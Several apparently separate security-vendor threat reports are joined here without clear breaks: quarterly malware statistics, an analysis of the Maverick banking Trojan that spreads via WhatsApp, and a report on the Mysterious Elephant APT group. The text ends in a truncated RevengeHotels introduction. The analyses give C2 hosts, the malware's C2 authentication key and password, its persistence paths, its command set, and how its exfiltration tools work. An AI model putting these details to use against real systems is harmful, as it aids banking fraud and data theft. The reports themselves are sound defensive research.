* Data for the previous quarter may differ slightly from previously published data due to some verdicts being retrospectively revised.

The PasivRobber spyware continues to increase its activity, with its modifications occupying the top spots in the list of the most widespread macOS malware varieties. Other highly active threats include Amos Trojans, which steal passwords and cryptocurrency wallet data, and various adware. The Backdoor.OSX.Agent.l family, which took thirteenth place, represents a variation on the well-known open-source malware, Mettle.

Geography of threats to macOS

TOP 10 countries and territories by share of attacked users

Country/territory	%* Q2 2025	%* Q3 2025
Mainland China	2.50	1.70
Italy	0.74	0.85
France	1.08	0.83
Spain	0.86	0.81
Brazil	0.70	0.68
The Netherlands	0.41	0.68
Mexico	0.76	0.65
Hong Kong	0.84	0.62
United Kingdom	0.71	0.58
India	0.76	0.56

IoT threat statistics

This section presents statistics on attacks targeting Kaspersky IoT honeypots. The geographic data on attack sources is based on the IP addresses of attacking devices.

In Q3 2025, there was a slight increase in the share of devices attacking Kaspersky honeypots via the SSH protocol.

Distribution of attacked services by number of unique IP addresses of attacking devices (download)

Conversely, the share of attacks using the SSH protocol slightly decreased.

Distribution of attackers’ sessions in Kaspersky honeypots (download)

TOP 10 threats delivered to IoT devices

Share of each threat delivered to an infected device as a result of a successful attack, out of the total number of threats delivered (download)

In the third quarter, the shares of the NyaDrop and Mirai.b botnets significantly decreased in the overall volume of IoT threats. Conversely, the activity of several other members of the Mirai family, as well as the Gafgyt botnet, increased. As is typical, various Mirai variants occupy the majority of the list of the most widespread malware strains.

Attacks on IoT honeypots

Germany and the United States continue to lead in the distribution of attacks via the SSH protocol. The share of attacks originating from Panama and Iran also saw a slight increase.

Country/territory	Q2 2025	Q3 2025
Germany	24.58%	13.72%
United States	10.81%	13.57%
Panama	1.05%	7.81%
Iran	1.50%	7.04%
Seychelles	6.54%	6.69%
South Africa	2.28%	5.50%
The Netherlands	3.53%	3.94%
Vietnam	3.00%	3.52%
India	2.89%	3.47%
Russian Federation	8.45%	3.29%

The largest number of attacks via the Telnet protocol were carried out from China, as is typically the case. Devices located in India reduced their activity, whereas the share of attacks from Indonesia increased.

Country/territory	Q2 2025	Q3 2025
China	47.02%	57.10%
Indonesia	5.54%	9.48%
India	28.08%	8.66%
Russian Federation	4.85%	7.44%
Pakistan	3.58%	6.66%
Nigeria	1.66%	3.25%
Vietnam	0.55%	1.32%
Seychelles	0.58%	0.93%
Ukraine	0.51%	0.73%
Sweden	0.39%	0.72%

Attacks via web resources

The statistics in this section are based on detection verdicts by Web Anti-Virus, which protects users when suspicious objects are downloaded from malicious or infected web pages. These malicious pages are purposefully created by cybercriminals. Websites that host user-generated content, such as message boards, as well as compromised legitimate sites, can become infected.

TOP 10 countries that served as sources of web-based attacks

This section gives the geographical distribution of sources of online attacks (such as web pages redirecting to exploits, sites hosting exploits and other malware, and botnet C2 centers) blocked by Kaspersky products. One or more web-based attacks could originate from each unique host.

To determine the geographic source of web attacks, we matched the domain name with the real IP address where the domain is hosted, then identified the geographic location of that IP address (GeoIP).

In the third quarter of 2025, Kaspersky solutions blocked 389,755,481 attacks from internet resources worldwide. Web Anti-Virus was triggered by 51,886,619 unique URLs.

Web-based attacks by country, Q3 2025 (download)

Countries and territories where users faced the greatest risk of online infection

To assess the risk of malware infection via the internet for users’ computers in different countries and territories, we calculated the share of Kaspersky users in each location on whose computers Web Anti-Virus was triggered during the reporting period. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.

This ranked list includes only attacks by malicious objects classified as Malware. Our calculations leave out Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.

	Country/territory*	%**
1	Panama	11.24
2	Bangladesh	8.40
3	Tajikistan	7.96
4	Venezuela	7.83
5	Serbia	7.74
6	Sri Lanka	7.57
7	North Macedonia	7.39
8	Nepal	7.23
9	Albania	7.04
10	Qatar	6.91
11	Malawi	6.90
12	Algeria	6.74
13	Egypt	6.73
14	Bosnia and Herzegovina	6.59
15	Tunisia	6.54
16	Belgium	6.51
17	Kuwait	6.49
18	Turkey	6.41
19	Belarus	6.40
20	Bulgaria	6.36

* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.
** Unique users targeted by web-based Malware attacks as a percentage of all unique users of Kaspersky products in the country/territory.
On average, over the course of the quarter, 4.88% of devices globally were subjected to at least one web-based Malware attack.

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer by infecting files or removable media, or initially made their way onto the computer in non-open form. Examples of the latter are programs in complex installers and encrypted files.

Data in this section is based on analyzing statistics produced by anti-virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media: flash drives, camera memory cards, phones, and external drives. The statistics are based on detection verdicts from the on-access scan (OAS) and on-demand scan (ODS) modules of File Anti-Virus.

In the third quarter of 2025, our File Anti-Virus recorded 21,356,075 malicious and potentially unwanted objects.

Countries and territories where users faced the highest risk of local infection

For each country and territory, we calculated the percentage of Kaspersky users on whose computers File Anti-Virus was triggered during the reporting period. This statistic reflects the level of personal computer infection in different countries and territories around the world.

Note that this ranked list includes only attacks by malicious objects classified as Malware. Our calculations leave out File Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.

	Country/territory*	%**
1	Turkmenistan	45.69
2	Yemen	33.19
3	Afghanistan	32.56
4	Tajikistan	31.06
5	Cuba	30.13
6	Uzbekistan	29.08
7	Syria	25.61
8	Bangladesh	24.69
9	China	22.77
10	Vietnam	22.63
11	Cameroon	22.53
12	Belarus	21.98
13	Tanzania	21.80
14	Niger	21.70
15	Mali	21.29
16	Iraq	20.77
17	Nicaragua	20.75
18	Algeria	20.51
19	Congo	20.50
20	Venezuela	20.48

* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.
** Unique users on whose computers local Malware threats were blocked, as a percentage of all unique users of Kaspersky products in the country/territory.
On average worldwide, local Malware threats were detected at least once on 12.36% of computers during the third quarter.

A malware campaign was recently detected in Brazil, distributing a malicious LNK file using WhatsApp. It targets mainly Brazilians and uses Portuguese-named URLs. To evade detection, the command-and-control (C2) server verifies each download to ensure it originates from the malware itself.
The whole infection chain is complex and fully fileless, and by the end, it will deliver a new banking Trojan named Maverick, which contains many code overlaps with Coyote. In this blog post, we detail the entire infection chain, encryption algorithm, and its targets, as well as discuss the similarities with known threats.

Key findings:

• A massive campaign disseminated through WhatsApp distributed the new Brazilian banking Trojan named “Maverick” through ZIP files containing a malicious LNK file, which is not blocked on the messaging platform.
• Once installed, the Trojan uses the open-source project WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp Web, taking advantage of the access to send the malicious message to contacts.
• The new Trojan features code similarities with another Brazilian banking Trojan called Coyote; however, we consider Maverick to be a new threat.
• The Maverick Trojan checks the time zone, language, region, and date and time format on infected machines to ensure the victim is in Brazil; otherwise, the malware will not be installed.
• The banking Trojan can fully control the infected computer, taking screenshots, monitoring open browsers and websites, installing a keylogger, controlling the mouse, blocking the screen when accessing a banking website, terminating processes, and opening phishing pages in an overlay. It aims to capture banking credentials.
• Once active, the new Trojan will monitor the victims’ access to 26 Brazilian bank websites, 6 cryptocurrency exchange websites, and 1 payment platform.
• All infections are modular and performed in memory, with minimal disk activity, using PowerShell, .NET, and shellcode encrypted using Donut.
• The new Trojan uses AI in the code-writing process, especially in certificate decryption and general code development.
• Our solutions have blocked 62 thousand infection attempts using the malicious LNK file in the first 10 days of October, only in Brazil.

Initial infection vector

The infection chain works according to the diagram below:

The infection begins when the victim receives a malicious .LNK file inside a ZIP archive via a WhatsApp message. The filename can be generic, or it can pretend to be from a bank:

The message said, “Visualization allowed only in computers. In case you’re using the Chrome browser, choose “keep file” because it’s a zipped file”.

The LNK is encoded to execute cmd.exe with the following arguments:

The decoded commands point to the execution of a PowerShell script:

The command will contact the C2 to download another PowerShell script. It is important to note that the C2 also validates the “User-Agent” of the HTTP request to ensure that it is coming from the PowerShell command. This is why, without the correct “User-Agent”, the C2 returns an HTTP 401 code.

The entry script is used to decode an embedded .NET file, and all of this occurs only in memory. The .NET file is decoded by dividing each byte by a specific value; in the script above, the value is “174”. The PE file is decoded and is then loaded as a .NET assembly within the PowerShell process, making the entire infection fileless, that is, without files on disk.

Initial .NET loader

The initial .NET loader is heavily obfuscated using Control Flow Flattening and indirect function calls, storing them in a large vector of functions and calling them from there. In addition to obfuscation, it also uses random method and variable names to hinder analysis. Nevertheless, after our analysis, we were able to reconstruct (to a certain extent) its main flow, which consists of downloading and decrypting two payloads.

The obfuscation does not hide the method’s variable names, which means it is possible to reconstruct the function easily if the same function is reused elsewhere. Most of the functions used in this initial stage are the same ones used in the final stage of the banking Trojan, which is not obfuscated. The sole purpose of this stage is to download two encrypted shellcodes from the C2. To request them, an API exposed by the C2 on the “/api/v1/” routes will be used. The requested URL is as follows:

• hxxps://sorvetenopote.com/api/v1/3d045ada0df942c983635e

To communicate with its API, it sends the API key in the “X-Request-Headers” field of the HTTP request header. The API key used is calculated locally using the following algorithm:

• “Base64(HMAC256(Key))”

The HMAC is used to sign messages with a specific key; in this case, the threat actor uses it to generate the “API Key” using the HMAC key “MaverickZapBot2025SecretKey12345”. The signed data sent to the C2 is “3d045ada0df942c983635e|1759847631|MaverickBot”, where each segment is separated by “|”. The first segment refers to the specific resource requested (the first encrypted shellcode), the second is the infection’s timestamp, and the last, “MaverickBot”, indicates that this C2 protocol may be used in future campaigns with different variants of this threat. This ensures that tools like “wget” or HTTP downloaders cannot download this stage, only the malware.

Upon response, the encrypted shellcode is a loader using Donut. At this point, the initial loader will start and follow two different execution paths: another loader for its WhatsApp infector and the final payload, which we call “MaverickBanker”. Each Donut shellcode embeds a .NET executable. The shellcode is encrypted using a XOR implementation, where the key is stored in the last bytes of the binary returned by the C2. The algorithm to decrypt the shellcode is as follows:

• Extract the last 4 bytes (int32) from the binary file; this indicates the size of the encryption key.
• Walk backwards until you reach the beginning of the encryption key (file size – 4 – key_size).
• Get the XOR key.
• Apply the XOR to the entire file using the obtained key.

WhatsApp infector downloader

After the second Donut shellcode is decrypted and started, it will load another downloader using the same obfuscation method as the previous one. It behaves similarly, but this time it will download a PE file instead of a Donut shellcode. This PE file is another .NET assembly that will be loaded into the process as a module.

One of the namespaces used by this .NET executable is named “Maverick.StageOne,” which is considered by the attacker to be the first one to be loaded. This download stage is used exclusively to download the WhatsApp infector in the same way as the previous stage. The main difference is that this time, it is not an encrypted Donut shellcode, but another .NET executable—the WhatsApp infector—which will be used to hijack the victim’s account and use it to spam their contacts in order to spread itself.

This module, which is also obfuscated, is the WhatsApp infector and represents the final payload in the infection chain. It includes a script from WPPConnect, an open-source WhatsApp automation project, as well as the Selenium browser executable, used for web automation.

The executable’s namespace name is “ZAP”, a very common word in Brazil to refer to WhatsApp. These files use almost the same obfuscation techniques as the previous examples, but the method’s variable names remain in the source code. The main behavior of this stage is to locate the WhatsApp window in the browser and use WPPConnect to instrument it, causing the infected victim to send messages to their contacts and thus spread again. The file sent depends on the “MaverickBot” executable, which will be discussed in the next section.

Maverick, the banking Trojan

The Maverick Banker comes from a different execution branch than the WhatsApp infector; it is the result of the second Donut shellcode. There are no additional download steps to execute it. This is the main payload of this campaign and is embedded within another encrypted executable named “Maverick Agent,” which performs extended activities on the machine, such as contacting the C2 and keylogging. It is described in the next section.

Upon the initial loading of Maverick Banker, it will attempt to register persistence using the startup folder. At this point, if persistence does not exist, by checking for the existence of a .bat file in the “Startup” directory, it will not only check for the file’s existence but also perform a pattern match to see if the string “for %%” is present, which is part of the initial loading process. If such a file does not exist, it will generate a new “GUID” and remove the first 6 characters. The persistence batch script will then be stored as:

• “C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\” + “HealthApp-” + GUID + “.bat”.

Next, it will generate the bat command using the hardcoded URL, which in this case is:

• “hxxps://sorvetenopote.com” + “/api/itbi/startup/” + NEW_GUID.

In the command generation function, it is possible to see the creation of an entirely new obfuscated PowerShell script.

First, it will create a variable named “$URL” and assign it the content passed as a parameter, create a “Net.WebClient” object, and call the “DownloadString.Invoke($URL)” function. Immediately after creating these small commands, it will encode them in base64. In general, the script will create a full obfuscation using functions to automatically and randomly generate blocks in PowerShell. The persistence script reassembles the initial LNK file used to start the infection.

This persistence mechanism seems a bit strange at first glance, as it always depends on the C2 being online. However, it is in fact clever, since the malware would not work without the C2. Thus, saving only the bootstrap .bat file ensures that the entire infection remains in memory. If persistence is achieved, it will start its true function, which is mainly to monitor browsers to check if they open banking pages.

The browsers running on the machine are checked for possible domains accessed on the victim’s machine to verify the web page visited by the victim. The program will use the current foreground window (window in focus) and its PID; with the PID, it will extract the process name. Monitoring will only continue if the victim is using one of the following browsers:

* Chrome
* Firefox
* MS Edge
* Brave
* Internet Explorer
* Specific bank web browser

If any browser from the list above is running, the malware will use UI Automation to extract the title of the currently open tab and use this information with a predefined list of target online banking sites to determine whether to perform any action on them. The list of target banks is compressed with gzip, encrypted using AES-256, and stored as a base64 string. The AES initialization vector (IV) is stored in the first 16 bytes of the decoded base64 data, and the key is stored in the next 32 bytes. The actual encrypted data begins at offset 48.

This encryption mechanism is the same one used by Coyote, a banking Trojan also written in .NET and documented by us in early 2024.

If any of these banks are found, the program will decrypt another PE file using the same algorithm described in the .NET Loader section of this report and will load it as an assembly, calling its entry point with the name of the open bank as an argument. This new PE is called “Maverick.Agent” and contains most of the banking logic for contacting the C2 and extracting data with it.

Maverick Agent

The agent is the binary that will do most of the banker’s work; it will first check if it is running on a machine located in Brazil. To do this, it will check the following constraints:

What each of them does is:

• IsValidBrazilianTimezone()
  Checks if the current time zone is within the Brazilian time zone range. Brazil has time zones between UTC-5 (-300 min) and UTC-2 (-120 min). If the current time zone is within this range, it returns “true”.
• IsBrazilianLocale()
  Checks if the current thread’s language or locale is set to Brazilian Portuguese. For example, “pt-BR”, “pt_br”, or any string containing “portuguese” and “brazil”. Returns “true” if the condition is met.
• IsBrazilianRegion()
  Checks if the system’s configured region is Brazil. It compares region codes like “BR”, “BRA”, or checks if the region name contains “brazil”. Returns “true” if the region is set to Brazil.
• IsBrazilianDateFormat()
  Checks if the short date format follows the Brazilian standard. The Brazilian format is dd/MM/yyyy. The function checks if the pattern starts with “dd/” and contains “/MM/” or “dd/MM”.

Right after the check, it will enable appropriate DPI support for the operating system and monitor type, ensuring that images are sharp, fit the correct scale (screen zoom), and work well on multiple monitors with different resolutions. Then, it will check for any running persistence, previously created in “C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\”. If more than one file is found, it will delete the others based on “GetCreationTime” and keep only the most recently created one.

C2 communication

Communication uses the WatsonTCP library with SSL tunnels. It utilizes a local encrypted X509 certificate to protect the communication, which is another similarity to the Coyote malware. The connection is made to the host “casadecampoamazonas.com” on port 443. The certificate is exported as encrypted, and the password used to decrypt it is Maverick2025!. After the certificate is decrypted, the client will connect to the server.

For the C2 to work, a specific password must be sent during the first contact. The password used by the agent is “101593a51d9c40fc8ec162d67504e221”. Using this password during the first connection will successfully authenticate the agent with the C2, and it will be ready to receive commands from the operator. The important commands are:

Command	Description
INFOCLIENT	Returns the information of the agent, which is used to identify it on the C2. The information used is described in the next section.
RECONNECT	Disconnect, sleep for a few seconds, and reconnect again to the C2.
REBOOT	Reboot the machine
KILLAPPLICATION	Exit the malware process
SCREENSHOT	Take a screenshot and send it to C2, compressed with gzip
KEYLOGGER	Enable the keylogger, capture all locally, and send only when the server specifically requests the logs
MOUSECLICK	Do a mouse click, used for the remote connection
KEYBOARDONECHAR	Press one char, used for the remote connection
KEYBOARDMULTIPLESCHARS	Send multiple characters used for the remote connection
TOOGLEDESKTOP	Enable remote connection and send multiple screenshots to the machine when they change (it computes a hash of each screenshot to ensure it is not the same image)
TOOGLEINTERN	Get a screenshot of a specific window
GENERATEWINDOWLOCKED	Lock the screen using one of the banks’ home pages.
LISTALLHANDLESOPENEDS	Send all open handles to the server
KILLPROCESS	Kill some process by using its handle
CLOSEHANDLE	Close a handle
MINIMIZEHANDLE	Minimize a window using its handle
MAXIMIZEHANDLE	Maximize a window using its handle
GENERATEWINDOWREQUEST	Generate a phishing window asking for the victim’s credentials used by banks
CANCELSCREENREQUEST	Disable the phishing window

Agent profile info

In the “INFOCLIENT” command, the information sent to the C2 is as follows:

• Agent ID: A SHA256 hash of all primary MAC addresses used by all interfaces
• Username
• Hostname
• Operating system version
• Client version (no value)
• Number of monitors
• Home page (home): “home” indicates which bank’s home screen should be used, sent before the Agent is decrypted by the banking application monitoring routine.
• Screen resolution

Conclusion

According to our telemetry, all victims were in Brazil, but the Trojan has the potential to spread to other countries, as an infected victim can send it to another location. Even so, the malware is designed to target only Brazilians at the moment.
It is evident that this threat is very sophisticated and complex; the entire execution chain is relatively new, but the final payload has many code overlaps and similarities with the Coyote banking Trojan, which we documented in 2024. However, some of the techniques are not exclusive to Coyote and have been observed in other low-profile banking Trojans written in .NET. The agent’s structure is also different from how Coyote operated; it did not use this architecture before.
It is very likely that Maverick is a new banking Trojan using shared code from Coyote, which may indicate that the developers of Coyote have completely refactored and rewritten a large part of their components.
This is one of the most complex infection chains we have ever detected, designed to load a banking Trojan. It has infected many people in Brazil, and its worm-like nature allows it to spread exponentially by exploiting a very popular instant messenger. The impact is enormous. Furthermore, it demonstrates the use of AI in the code-writing process, specifically in certificate decryption, which may also indicate the involvement of AI in the overall code development. Maverick works like any other banking Trojan, but the worrying aspects are its delivery method and its significant impact.
We have detected the entire infection chain since day one, preventing victim infection from the initial LNK file. Kaspersky products detect this threat with the verdict HEUR:Trojan.Multi.Powenot.a and HEUR:Trojan-Banker.MSIL.Maverick.gen.

IoCs

Dominio	IP	ASN
casadecampoamazonas[.]com	181.41.201.184	212238
sorvetenopote[.]com	77.111.101.169	396356

Introduction

Mysterious Elephant is a highly active advanced persistent threat (APT) group that we at Kaspersky GReAT discovered in 2023. It has been consistently evolving and adapting its tactics, techniques, and procedures (TTPs) to stay under the radar. With a primary focus on targeting government entities and foreign affairs sectors in the Asia-Pacific region, the group has been using a range of sophisticated tools and techniques to infiltrate and exfiltrate sensitive information. Notably, Mysterious Elephant has been exploiting WhatsApp communications to steal sensitive data, including documents, pictures, and archive files.

The group’s latest campaign, which began in early 2025, reveals a significant shift in their TTPs, with an increased emphasis on using new custom-made tools as well as customized open-source tools, such as BabShell and MemLoader modules, to achieve their objectives. In this report, we will delve into the history of Mysterious Elephant’s attacks, their latest tactics and techniques, and provide a comprehensive understanding of this threat.

Additional information about this threat is available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

The emergence of Mysterious Elephant

Mysterious Elephant is a threat actor we’ve been tracking since 2023. Initially, its intrusions resembled those of the Confucius threat actor. However, further analysis revealed a more complex picture. We found that Mysterious Elephant’s malware contained code from multiple APT groups, including Origami Elephant, Confucius, and SideWinder, which suggested deep collaboration and resource sharing between teams. Notably, our research indicates that the tools and code borrowed from the aforementioned APT groups were previously used by their original developers, but have since been abandoned or replaced by newer versions. However, Mysterious Elephant has not only adopted these tools, but also continued to maintain, develop, and improve them, incorporating the code into their own operations and creating new, advanced versions. The actor’s early attack chains featured distinctive elements, such as remote template injections and exploitation of CVE-2017-11882, followed by the use of a downloader called “Vtyrei”, which was previously connected to Origami Elephant and later abandoned by this group. Over time, Mysterious Elephant has continued to upgrade its tools and expanded its operations, eventually earning its designation as a previously unidentified threat actor.

Latest campaign

The group’s latest campaign, which was discovered in early 2025, reveals a significant shift in their TTPs. They are now using a combination of exploit kits, phishing emails, and malicious documents to gain initial access to their targets. Once inside, they deploy a range of custom-made and open-source tools to achieve their objectives. In the following sections, we’ll delve into the latest tactics and techniques used by Mysterious Elephant, including their new tools, infrastructure, and victimology.

Spear phishing

Mysterious Elephant has started using spear phishing techniques to gain initial access. Phishing emails are tailored to each victim and are convincingly designed to mimic legitimate correspondence. The primary targets of this APT group are countries in the South Asia (SA) region, particularly Pakistan. Notably, this APT organization shows a strong interest and inclination towards diplomatic institutions, which is reflected in the themes covered by the threat actor’s spear phishing emails, as seen in bait attachments.

For example, the decoy document above concerns Pakistan’s application for a non-permanent seat on the United Nations Security Council for the 2025–2026 term.

Malicious tools

Mysterious Elephant’s toolkit is a noteworthy aspect of their operations. The group has switched to using a variety of custom-made and open-source tools instead of employing known malware to achieve their objectives.

PowerShell scripts

The threat actor uses PowerShell scripts to execute commands, deploy additional payloads, and establish persistence. These scripts are loaded from C2 servers and often use legitimate system administration tools, such as curl and certutil, to download and execute malicious files.

For example, the script above is used to download the next-stage payload and save it as ping.exe. It then schedules a task to execute the payload and send the results back to the C2 server. The task is set to run automatically in response to changes in the network profile, ensuring persistence on the compromised system. Specifically, it is triggered by network profile-related events (Microsoft-Windows-NetworkProfile/Operational), which can indicate a new network connection. A four-hour delay is configured after the event, likely to help evade detection.

BabShell

One of the most recent tools used by Mysterious Elephant is BabShell. This is a reverse shell tool written in C++ that enables attackers to connect to a compromised system. Upon execution, it gathers system information, including username, computer name, and MAC address, to identify the machine. The malware then enters an infinite loop of performing the following steps:

1. It listens for and receives commands from the attacker-controlled C2 server.
2. For each received command, BabShell creates a separate thread to execute it, allowing for concurrent execution of multiple commands.
3. The output of each command is captured and saved to a file named output_[timestamp].txt, where [timestamp] is the current time. This allows the attacker to review the results of the commands.
4. The contents of the output_[timestamp].txt file are then transmitted back to the C2 server, providing the attacker with the outcome of the executed commands and enabling them to take further actions, for instance, deploy a next-stage payload or execute additional malicious instructions.

BabShell uses the following commands to execute command-line instructions and additional payloads it receives from the server:

Customized open-source tools

One of the latest modules used by Mysterious Elephant and loaded by BabShell is MemLoader HidenDesk.

MemLoader HidenDesk is a reflective PE loader that loads and executes malicious payloads in memory. It uses encryption and compression to evade detection.

MemLoader HidenDesk operates in the following manner:

1. The malware checks the number of active processes and terminates itself if there are fewer than 40 processes running — a technique used to evade sandbox analysis.
2. It creates a shortcut to its executable and saves it in the autostart folder, ensuring it can restart itself after a system reboot.
3. The malware then creates a hidden desktop named “MalwareTech_Hidden” and switches to it, providing a covert environment for its activities. This technique is borrowed from an open-source project on GitHub.
4. Using an RC4-like algorithm with the key D12Q4GXl1SmaZv3hKEzdAhvdBkpWpwcmSpcD, the malware decrypts a block of data from its own binary and executes it in memory as a shellcode. The shellcode’s sole purpose is to load and execute a PE file, specifically a sample of the commercial RAT called “Remcos” (MD5: 037b2f6233ccc82f0c75bf56c47742bb).

Another recent loader malware used in the latest campaign is MemLoader Edge.

MemLoader Edge is a malicious loader that embeds a sample of the VRat backdoor, utilizing encryption and evasion techniques.

It operates in the following manner:

1. The malware performs a network connectivity test by attempting to connect to the legitimate website bing.com:445, which is likely to fail since the 445 port is not open on the server side. If the test were to succeed, suggesting that the loader is possibly in an emulation or sandbox environment, the malware would drop an embedded picture on the machine and display a popup window with three unresponsive mocked-up buttons, then enter an infinite loop. This is done to complicate detection and analysis.
2. If the connection attempt fails, the malware iterates through a 1016-byte array to find the correct XOR keys for decrypting the embedded PE file in two rounds. The process continues until the decrypted data matches the byte sequence of MZ\x90, indicating that the real XOR keys are found within the array.
3. If the malware is unable to find the correct XOR keys, it will display the same picture and popup window as before, followed by a message box containing an error message after the window is closed.
4. Once the PE file is successfully decrypted, it is loaded into memory using reflective loading techniques. The decrypted PE file is based on the open-source RAT vxRat, which is referred to as VRat due to the PDB string found in the sample:
   

   C:\Users\admin\source\repos\vRat_Client\Release\vRat_Client.pdb

WhatsApp-specific exfiltration tools

Spying on WhatsApp communications is a key aspect of the exfiltration modules employed by Mysterious Elephant. They are designed to steal sensitive data from compromised systems. The attackers have implemented WhatsApp-specific features into their exfiltration tools, allowing them to target files shared through the WhatsApp application and exfiltrate valuable information, including documents, pictures, archive files, and more. These modules employ various techniques, such as recursive directory traversal, XOR decryption, and Base64 encoding, to evade detection and upload the stolen data to the attackers’ C2 servers.

• Uplo Exfiltrator

The Uplo Exfiltrator is a data exfiltration tool that targets specific file types and uploads them to the attackers’ C2 servers. It uses a simple XOR decryption to deobfuscate C2 domain paths and employs a recursive depth-first directory traversal algorithm to identify valuable files. The malware specifically targets file types that are likely to contain potentially sensitive data, including documents, spreadsheets, presentations, archives, certificates, contacts, and images. The targeted file extensions include .TXT, .DOC, .DOCX, .PDF, .XLS, .XLSX, .CSV, .PPT, .PPTX, .ZIP, .RAR, .7Z, .PFX, .VCF, .JPG, .JPEG, and .AXX.

• Stom Exfiltrator

The Stom Exfiltrator is a commonly used exfiltration tool that recursively searches specific directories, including the “Desktop” and “Downloads” folders, as well as all drives except the C drive, to collect files with predefined extensions. Its latest variant is specifically designed to target files shared through the WhatsApp application. This version uses a hardcoded folder path to locate and exfiltrate such files:

%AppData%\\Packages\\xxxxx.WhatsAppDesktop_[WhatsApp ID]\\LocalState\\Shared\\transfers\\

The targeted file extensions include .PDF, .DOCX, .TXT, .JPG, .PNG, .ZIP, .RAR, .PPTX, .DOC, .XLS, .XLSX, .PST, and .OST.

• ChromeStealer Exfiltrator

The ChromeStealer Exfiltrator is another exfiltration tool used by Mysterious Elephant that targets Google Chrome browser data, including cookies, tokens, and other sensitive information. It searches specific directories within the Chrome user data of the most recently used Google Chrome profile, including the IndexedDB directory and the “Local Storage” directory. The malware uploads all files found in these directories to the attacker-controlled C2 server, potentially exposing sensitive data like chat logs, contacts, and authentication tokens. The response from the C2 server suggests that this tool was also after stealing files related to WhatsApp. The ChromeStealer Exfiltrator employs string obfuscation to evade detection.

Infrastructure

Mysterious Elephant’s infrastructure is a network of domains and IP addresses. The group has been using a range of techniques, including wildcard DNS records, to generate unique domain names for each request. This makes it challenging for security researchers to track and monitor their activities. The attackers have also been using virtual private servers (VPS) and cloud services to host their infrastructure. This allows them to easily scale and adapt their operations to evade detection. According to our data, this APT group has utilized the services of numerous VPS providers in their operations. Nevertheless, our analysis of the statistics has revealed that Mysterious Elephant appears to have a preference for certain VPS providers.

VPS providers most commonly used by Mysterious Elephant (download)

Victimology

Mysterious Elephant’s primary targets are government entities and foreign affairs sectors in the Asia-Pacific region. The group has been focusing on Pakistan, Bangladesh, and Sri Lanka, with a lower number of victims in other countries. The attackers have been using highly customized payloads tailored to specific individuals, highlighting their sophistication and focus on targeted attacks.

The group’s victimology is characterized by a high degree of specificity. Attackers often use personalized phishing emails and malicious documents to gain initial access. Once inside, they employ a range of tools and techniques to escalate privileges, move laterally, and exfiltrate sensitive information.

• Most targeted countries: Pakistan, Bangladesh, Afghanistan, Nepal and Sri Lanka

Countries targeted most often by Mysterious Elephant (download)

• Primary targets: government entities and foreign affairs sectors

Industries most targeted by Mysterious Elephant (download)

Conclusion

In conclusion, Mysterious Elephant is a highly sophisticated and active Advanced Persistent Threat group that poses a significant threat to government entities and foreign affairs sectors in the Asia-Pacific region. Through their continuous evolution and adaptation of tactics, techniques, and procedures, the group has demonstrated the ability to evade detection and infiltrate sensitive systems. The use of custom-made and open-source tools, such as BabShell and MemLoader, highlights their technical expertise and willingness to invest in developing advanced malware.

The group’s focus on targeting specific organizations, combined with their ability to tailor their attacks to specific victims, underscores the severity of the threat they pose. The exfiltration of sensitive information, including documents, pictures, and archive files, can have significant consequences for national security and global stability.

To counter the Mysterious Elephant threat, it is essential for organizations to implement robust security measures, including regular software updates, network monitoring, and employee training. Additionally, international cooperation and information sharing among cybersecurity professionals, governments, and industries are crucial in tracking and disrupting the group’s activities.

Ultimately, staying ahead of Mysterious Elephant and other APT groups requires a proactive and collaborative approach to cybersecurity. By understanding their TTPs, sharing threat intelligence, and implementing effective countermeasures, we can reduce the risk of successful attacks and protect sensitive information from falling into the wrong hands.

Indicators of compromise

More IoCs are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

File hashes

Malicious documents
c12ea05baf94ef6f0ea73470d70db3b2 M6XA.rar
8650fff81d597e1a3406baf3bb87297f 2025-013-PAK-MoD-Invitation_the_UN_Peacekeeping.rar

MemLoader HidenDesk
658eed7fcb6794634bbdd7f272fcf9c6 STI.dll
4c32e12e73be9979ede3f8fce4f41a3a STI.dll

MemLoader Edge
3caaf05b2e173663f359f27802f10139 Edge.exe, debugger.exe, runtime.exe
bc0fc851268afdf0f63c97473825ff75

BabShell
85c7f209a8fa47285f08b09b3868c2a1
f947ff7fb94fa35a532f8a7d99181cf1

Uplo Exfiltrator
cf1d14e59c38695d87d85af76db9a861 SXSHARED.dll

Stom Exfiltrator
ff1417e8e208cadd55bf066f28821d94
7ee45b465dcc1ac281378c973ae4c6a0 ping.exe
b63316223e952a3a51389a623eb283b6 ping.exe
e525da087466ef77385a06d969f06c81
78b59ea529a7bddb3d63fcbe0fe7af94

ChromeStealer Exfiltrator
9e50adb6107067ff0bab73307f5499b6 WhatsAppOB.exe

Domains/IPs

hxxps://storycentral[.]net
hxxp://listofexoticplaces[.]com
hxxps://monsoonconference[.]com
hxxp://mediumblog[.]online:4443
hxxp://cloud.givensolutions[.]online:4443
hxxp://cloud.qunetcentre[.]org:443
solutions.fuzzy-network[.]tech
pdfplugins[.]com
file-share.officeweb[.]live
fileshare-avp.ddns[.]net
91.132.95[.]148
62.106.66[.]80
158.255.215[.]45

Background

RevengeHotels, also known as TA558, is a threat group that has been active since 2015, stealing credit card data from hotel guests and travelers. RevengeHotels’ modus operandi involves sending emails with phishing links which redirect victims to websites mimicking document storage. These sites, in turn, download script files to ultimately infect the targeted machines. The final payloads consist of various remote access Trojan (RAT) implants, which enable the threat actor to issue commands for controlling compromised systems, stealing sensitive data, and maintaining persistence, among other malicious activities.

In previous campaigns, the group was observed using malicious emails with Word, Excel, or PDF documents attached. Some of them exploited the CVE-2017-0199 vulnerability, loading Visual Basic Scripting (VBS), or PowerShell scripts to install customized versions of different RAT families, such as RevengeRAT, NanoCoreRAT, NjRAT, 888 RAT, and custom malware named ProCC. These campaigns affected hotels in multiple countries across Latin America, including Brazil, Argentina, Chile, and Mexico, but also hotel front-desks globally, particularly in Russia, Belarus, Turkey, and so on.

